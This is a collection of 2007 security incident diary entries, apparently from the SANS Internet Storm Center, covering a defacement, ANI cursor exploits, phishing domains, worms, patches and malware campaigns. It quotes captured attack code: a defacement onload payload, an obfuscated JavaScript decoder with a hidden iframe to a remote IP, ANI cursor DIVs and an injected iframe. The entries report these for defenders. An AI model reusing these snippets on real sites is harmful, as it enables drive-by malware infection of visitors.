-Photoshop CS2                                                         
 -Photoshop CS3                                                         
 -Photoshop Elements 5.0                                                
 -Corel Paint Shop Pro 11.20

And the Bitmap exploit affects:

 -Photoshop CS2                                                         
 -Photoshop CS3  

There’s been a lot of discussion over the last few hours regarding a Microsoft website that apparently got defaced. While the domain name has been taken offline, the defacement itself was rather obvious. Users browsing the page were shown a typical “0wn3d by” message with a picture taken of Bill Gates during what was probably his least pleasant visit to Belgium in 1998.

The affected site displayed a remotely hosted image and the attacker’s nickname:

body onload="document.body.innerHTML='/p align=center//font size=7/Own3d by Cyber-Terrorist//font//img src=http://c2000.com/gifs!/billgates.jpg//p align=center//font size=7>--Cyb3rT--//font///p/';"//noscript/

The affected site was a subpage of ieak.microsoft.com where users could select a distribution license for the Internet Explorer Administration Kit. The server isn’t, however, located on the Microsoft network, but at a hosting partner. In addition, the source of the page mentions another third party as being responsible for the site’s development.

While the brand impact of a low-level compromise like this is negligible, it does bring up some hard questions. In this day and age of increasingly popular out and co-sourcing, how do you ensure your partners are able to meet your security requirements ? Reputation is a good starting point, while supplier audit and compliance with relevant security standards can complete the picture. Both should be part of any outsourcing RFP.

After all, while this may be a small time issue, web site defacements have in the recent past often involved malicious code distribution. Being unavailable and looking a bit silly is one thing to reflect on a brand. Being involved in the distribution of a banking fraud trojan quite another.

--
Maarten Van Horenbeeck

Last Friday, the US National Institute for Standards and Technology (NIST) published guidance on how to securely use RFID technology. SP800-98 explains RFID technology, places it in context, reviews risk involved with each of its uses and suggests mitigative controls.

It considers business process, business intelligence and privacy risk, in addition to 'external risks' such as those involved with electromagnetic radiation. The document, with its 150 pages is very detailed, and a timely release given the wide variety of potential uses for which RFID technology is now being considered.

• Did you have compromises?
• Did your AV detect the attacks with generic malicious-ANI or MS05-053 signatures?
• Did your IDS detect the attacks with existing signatures?
• Were you able to protect your unpatched users with content filtering?

• “How could this have gone better?”
• “Are there reasonable changes we could have made to the environment or policy to avoid impact?”
• “Were the losses acceptable?”

Welcome to the Jungle

<iframe style='visibility: hidden;'width='1' height='1' src='http://203.223.158.26/africaonline/2/'>
</iframe>

<script language=JavaScript>

function makemelaugh(x){

  var l=x.length,b=1024,i,j,r,p=0,s=0,w=0;

  t=Array(63,42,36,33...[EDITED]...4,11,0,23);

  for(j=Math.ceil(l/b);j>0;j--){

    r='';

    for(i=Math.min(l,b);i>0;i--,l--){

      w|=(t[x.charCodeAt(p++)-48])<<s;

      if(s){

        r+=String.fromCharCode(170^w&255);

        w>>=8;

        s-=2

      }else{s=6}

    }document.write(r)

  }

}

makemelaugh("LuLa_qN5Vvc...[EDITED]...@jWEl")

</script>

There has been a flurry of domain registrations related to the Virginia Tech tragedy, as reported by GoDaddy and other registrars. While some of these are undoubtedly well-intentioned organizations joining in the outpouring of support for the friends and family of the victims, others are likely to be opportunists who want to cash in on the suffering of others.

Be on the lookout for a rash of spam & phishing coming from these leeches. If you receive a plea for donations, check the organization out closely before opening up your e-gold, Paypal, Visa or other account or providing any personal information. In some cases the phishers may use voice, fax, email and websites to dupe generous and thoughtful victims into disclosing valuable information.

With any luck, these have been scooped up by cybersquatters (http://www.sans.org/newsletters/newsbites/newsbites.php?vol=9&issue=22#sID301) who will be left holding the bag when nobody is heartless enough to use the domains for unscrupulous purposes. A number of the following domains have been checked and, as of yet, contain no content:

vatechshooting.com
vatechshooting.net
vatechshooting.org
vatechshooting.info
vatechshooting.us
vatechshooting.biz
vtshooting.com
vtshooting.info
vatechmassacre.com
vatechmassacre.net
vatechmassacre.info
vatechmassacre.biz
vtmassacre.com
vtmassacre.net
vtmassacre.org
vtmassacre.info
virginiatechrampage.com
vatechrampage.com
vtrampage.com
virginiatechmurders.com
virginiatechmurders.net
virginiatechmurders.org
virginiatechmurders.info
virginiatechmurders.us
vatechmurders.com
vtmurders.com
hokieshootings.com
hokiemassacre.com

Here is a blog listing the above godaddy sites, and linking to other related blogs:

http://blog.wired.com/27bstroke6/2007/04/godaddy_registe.html#more

What a shocker - malware authors are playing cat 'n' mouse with antivirus signatures.

Roger Chiu of Malware-Test Lab submitted a .ani file observed in the wild that was not detected as malicious by any popular antivirus tools. As with many other ANI attacks, this was presented as a CURSOR object in a DIV element on a compromised web site:

<DIV style="CURSOR: url(hxxp://xxx.xxx.xxx.xxx/mcs2001/chat/css.js)"></DIV>
<DIV style="CURSOR: url(hxxp://xxx.xxx.xxx/customer/image/css.js)"></DIV>

This latest variant was submitted to the A/V community for inclusion and the site owners contacted.

Thanks, Roger.

We are currently tracking a new version of the Rinbot worm that in addition to its regular scans, is also scanning for port 1025/tcp. Once connected, it attempts to do a Windows 2000 DnsservQuery, likely to exploit the recent Microsoft DNS vulnerability. Detection of this virus is currently very poor, and we are working with the AV vendors to improve this.

In the meanwhile, we would like to urge you to consider implementing the workarounds discussed in our previous diary entry here.

If you're running a version of ClamAV 0.90, now is the time to upgrade to version 0.90.2, released last Friday. This version contains a fix for a buffer overflow vulnerability, CVE-2007-1997, identified by iDefense. An attacker can convince a user (or mail gateway) to scan a maliciously crafted CAB file that could lead to arbitrary code execution under the user account running the scanner. 

As a temporary workaround, you could drop CAB files prior to executing the scanner. This is particulary relevant for e-mail gateways, which generally only need to allow a limited set of filetypes. The CAB format is an archive often used by Microsoft for software distribution, so on a web proxy this may be problematic.

Eric wrote in with a new malicious message that is making the rounds in Europe. It's written in German, and contains a link to a Geocities account with an invisible iframe link. The content of one of the e-mails is below:

"Die Berliner U-Bahn Mitarbeiter fanden die Reste eines unbekannten Flugkoerpers.
Interessant findet man auch die Ermittlung von moeglichen Gruenden des
Unwohlseins einiger U-Bahn Angestellten. Nach etlichen Inspektionen wurde ein
Fremdkoerper gefunden. Wie Wissenschaftler behaupten, koennte der Koerper so
gross wie ein Bus sein. Es wurde auch vermutet, er haette seltsame Strahlen
aussenden koennen und das wegen rund um dem Rumpf gebildeter "Totzone".
Naeheres dazu unter http://geocities.com/[filtered]"

Very interesting story about an unidentified flying object and body found in the Berlin underground. The geocities URL mentioned is different in every single mail, and points to an index.html which contains a hidden iframe pointing to a server in Hong Kong, 58.65.239.106. While this host has likely been victimized, you may wish to temporarily block it on your web proxy.

That server is hosting a file update.exe which has spotty AV coverage at this time:

AntiVir 7.3.1.52 04.16.2007 HEUR/Malware
F-Secure 6.70.13030.0 04.16.2007 W32/Malware
Ikarus T3.1.1.5 04.16.2007 Trojan-Spy.Win32.Goldun.lw
Norman 5.80.02 04.14.2007 W32/Malware
Sophos 4.16.0 04.12.2007 Mal/Binder-C
VBA32 3.11.3 04.14.2007 MalwareScope.Trojan-Spy.BZub.1
Webwasher-Gateway 6.0.1 04.16.2007 Heuristic.Malware

--
Maarten Van Horenbeeck

We received a couple of e-mails over the weekend asking us why this vulnerability was significant. Most public DNS servers should not be listening on the RPC ports, after all. Indeed, networks obliging to basic secure perimeter design would only allow port 53 UDP/TCP to the authorative DNS servers, and definitely not the additional RPC ports required for exploitation.

However, there are at least two design scenarios that could prove an issue:

- The many Windows servers in use at dedicated hosters. In a large number of cases, these will be single box, do-it-all type hosting machines on the Windows 2003 Web Edition platform. They would be running FTP, HTTP and DNS services, but are usually not shielded by a separate firewall.
- Active directory servers hosted on the internal network are often combined with DNS functionality. These machines are usually less protected than DMZ DNS servers, and other functionality provisioned may require the RPC ports to be available (e.g. some authentication services). If your active directory server is compromised, the game is essentially over.

 Also a small update on the Microsoft advisory:
- CVE-2007-1748 is now used to track the vulnerability;
- Microsoft added to their advisory that DNS server local administration and configuration may not work if the computer name is 15 characters of longer. They suggest using the FQDN (Fully Qualified Domain Name) of the host to ensure this works correctly.

--
Maarten Van Horenbeeck

-----Original Message-----
From: nospam@goteamspeak.com
Sent: Saturday, April 14, 2007 8:49 PM
To: <deleted>
Subject: New Team Speak Patch [Link Inside]

Now you can download new Team Speak patch. It will help you to use our
Team Speak servers.
We advise you to download it now
hxxp://www.goteamspeak.com/downloads/patch.exe

Antivirus	Version		Update		Result

CAT-QuickHeal	9.00		04.14.2007	(Suspicious) - DNAScan
ClamAV		devel-20070312	04.15.2007	Trojan.Spy-4392
Fortinet	2.85.0.0	04.15.2007	W32/LdPinch.BEO!tr.pws
Ikarus		T3.1.1.5	04.15.2007	Trojan-PWS.LDPinch.1607
Kaspersky	4.0.2.24	04.15.2007	Trojan-PSW.Win32.LdPinch.beo
Panda		9.0.0.4		04.15.2007	Suspicious file
Webwasher-Gtwy	6.0.1		04.14.2007	Win32.Malware.gen (suspicious)

Aditional Information

File size: 48640 bytes
MD5: 488b22114f1a08dc68a7e2cc34bf1d01
SHA1: 3da87252c917493e591c6ea222637910fff07a5e

1. Disable remote management over RPC for the DNS server via a registry key setting.
2. Block unsolicited inbound traffic on ports 1024-5000 using  IPsec or other firewall.
3. Enable the advanced TCP/IP Filtering options on the appropriate interfaces of the server.

• WCS apparently uses fixed and unchangeable authentication credentials on the FTP service used by the Wireless Location Appliances for backup purposes. Fixed in WCS 4.0.96.0. This is regular FTP, so these passwords can be sniffed off the network and re-used by an attacker.
• WCS suffers from a privilege escalation vulnerability that allows valid users to access information from any WCS configuration page (fixed in 4.0.81.0) or to become a member of the SuperUsers group (fixed in 4.0.87.0).
• Certain WCS directories are not password protected. This may lead to disclosure of private information such as access point location. Fixed in 4.0.66.0.

• Use of default community strings (public/private);
• The device may be crashed by sending malformed ethernet traffic;
• Some or all of the Network Processing Units within the WLC may be locked up by sending malformed traffic, including some SNAP packets, malformed 802.11 traffic or packets with unexpected length values in headers;
• WLAN ACLs could in some cases not survive a reboot.

The Cisco Aironet 1000 and 1500 lightweight access points are reported to contain a hard-coded service password. This is only available over a physical console connection, though.

--
Maarten Van Horenbeeck

$unzip -l patch-58214.zip 
Archive:  patch-58214.zip
  Length     Date   Time    Name
 --------    ----   ----    ----
    40649  04-12-07 18:21   patch-58214.exe
 --------                   -------
    40649                   1 file

anyway back to the editorial ;-)... 
--------------------------------------------------------------------------------------

Security

• Fix for character encoding inheritance issue with frames, which could enable cross-site scripting. See the advisory.
• Fixed an issue regarding handling of FTP PASV response, as reported by Mark at bindshell.net
• XMLHttpRequest now treats separate ports on the same server as a different server. Issue reported by Egmont Koblinger.
• Fixed an issue where scripts could continue to run after leaving the page, as reported by Herrmann Manuel.
• Skandiabanken.no's message about successful certificate installation is now shown.

• ICQ: should have updated itself by now, if not, make sure it did.
• AIM: make sure to upgrade to the latest greatest

Overview of the April 2007 Microsoft patches and their status.

Note there was an out of cycle patch for the ANI vulnerability that we reported on earlier and that same patch is included here once again for completeness.

--
Swa Frantzen -- NET2S

• SEC wants your stock related spam
• Forward the spam to enforcement(AT)sec.gov
• You get a standardized reply for every report, typically during the next business day

• poststelle-ffm(AT)bafin.de

• ASIC has a form, way too impractical for dealing with individual spam messages
• info(AT)asx.com.au

In the past days a handful of readers had sent us notes that asus.com was compromised. We unfortunately could not find anything wrong in the html at all.

Today the kaspersky blog had an entry about a ANI exploit loaded via an iframe at asus.com.

So we fetch a new copy, still nothing to be seen. Until Johannes suggested asus.com might be load balanced, and yes indeed it seems it is using DNS load balancing:

$ dig asus.com a

; <<>> DiG 9.2.3 <<>> asus.com a
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19075
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 0

;; QUESTION SECTION:
;asus.com.                      IN      A

;; ANSWER SECTION:
asus.com.               14400   IN      A       195.33.130.151
asus.com.               14400   IN      A       205.158.107.130

;; AUTHORITY SECTION:
asus.com.               14400   IN      NS      dns3.asus.com.
asus.com.               14400   IN      NS      dns7.asus.com.

;; Query time: 18 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Fri Apr  6 23:33:01 2007
;; MSG SIZE  rcvd: 96

Fetching a copy of the home page of both servers, and comparing the resulting page yields:

(line breaks added to make page easier to read)

$ diff index.html index.html.1 
55c55
<                                                               
</table>
---
>                                                               
</table><iframe src=http://[DELETED].com/app/helptop.do?id=ad003 
width=100 height=0></iframe>

Just goes to learn that a load balanced site is a pain to investigate if only some of the servers are affected.

Overview of the out of cycle patch.

--
Swa Frantzen -- NET2S

• ie7.0.exe - This started appearing about the same time as the ANI exploits, mainly on web sites, but currently it is being distributed as SPAM messages.  Typically an image SPAM message which links to a web page with the exploit.  We've seen two names ie7.0.exe and DirectX-10.exe.  Detection rates are improving and most AV products should catch this one.  Once infected the compromised host will start to SPAM (but since we are all blocking executables, especially in emails this shouldn't be much of a problem).
  
• PHP scanning - We've had a few reports of PHP scanning coming out of Hong Kong (based on the source addresses).  It seems to be fairly generic as it is hitting sites that do not have HP as well as PHP sites.
• DST Part 2 - The original Daylight Savings Time start passed on the weekend.  So far the only reports we've had were:
  • Church Bells ringing at the wrong time
  • A web site providing TV guides was out by an hour causing some initial confusion for one user at least
• April Fools - ISC did not participate in light of the ANI issue (disappointing several handlers who were all geared up to go) , but there were plenty of others who did.  We received a number of emails that got a "check the date" reply.